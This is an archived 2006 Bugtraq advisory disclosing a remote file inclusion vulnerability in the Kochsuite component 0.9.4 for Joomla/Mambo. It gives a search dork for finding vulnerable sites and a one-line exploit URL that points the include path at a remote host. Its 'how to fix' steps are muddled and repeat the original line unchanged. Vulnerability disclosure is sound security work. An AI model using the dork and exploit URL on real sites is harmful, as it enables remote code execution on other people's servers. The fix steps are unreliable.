lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 18 Aug 2006 16:39:27 -0000
From: camino@...magnet.com
To: bugtraq@...urityfocus.com
Subject: Joomla Kochsuite Component <= 0.9.4 (config.kochsuite.php) Remote
 File Inclusion Vulnerability

 
    .:[ insecurity research team ]:.
     .__..____.:.______.____.:.____ .
 .:. |  |/    \:/  ___// __ \:/   _\.:.
   : |  |   |  \\____\\  ___/\   /__ :. .
 ..: |__|___|  /____  >\___  >\___  >.:
   .:.. ..  .\/   .:\/:.  .\/.  .:\/:
 .   ...:.    .advisory.    .:...
         :..................: 18.o8.2oo6 ..
 
 
  Affected Application: Kochsuite v0.9.4

       (Mambo/Joomla CMS Component)
 
 
 . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  Discoverd by: camino
 
  Team: Insecurity Research Team
 
  URL: http://www.insecurityresearch.org
 
  E-Mail: camino[at]sexmagnet[dot]com
 
 
 
 . . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
 
 
  Typ: Remote [x]  Local [ ]
 
       Remote File Inclusion [x]  SQL Injection [ ]
 
  Level: Low [ ]  Middle [x]  High [ ]
 
  Application: Kochsuite
 
  Version: 0.9.4
 
  Vulnerable File: config.kochsuite.php
 
  URL: http://www.vegisto.com
 
  Description: It's a component for chiefs to publish theirs stuff...
 
  Dork: inurl:"com_kochsuite"
 
 
 
 . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


  http://[sitepath]/[joomlapath]/administrator/components/com_kochsuite/

  config.kochsuite.php?mosConfig_absolute_path=http://huh?
 
 
 
 . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  o1.) open config.kochsuite.php
 
  o2.) take a look at line 46:

         # Don't allow direct linking    defined( '_VALID_MOS' ) or 

         die( 'Direct Access to this location is not allowed.' );

  o3.) take a look at line 47:

         require_once ($mosConfig_absolute_path.'/administrator/

         components/com_kochsuite/includes/letters.inc');
 
  o4.) change line 46:

         defined( '_VALID_MOS' ) or 

         die( 'Direct Access to this location is not allowed.' );
 
 
 
 . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members 

  of insecurity research team ;-)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ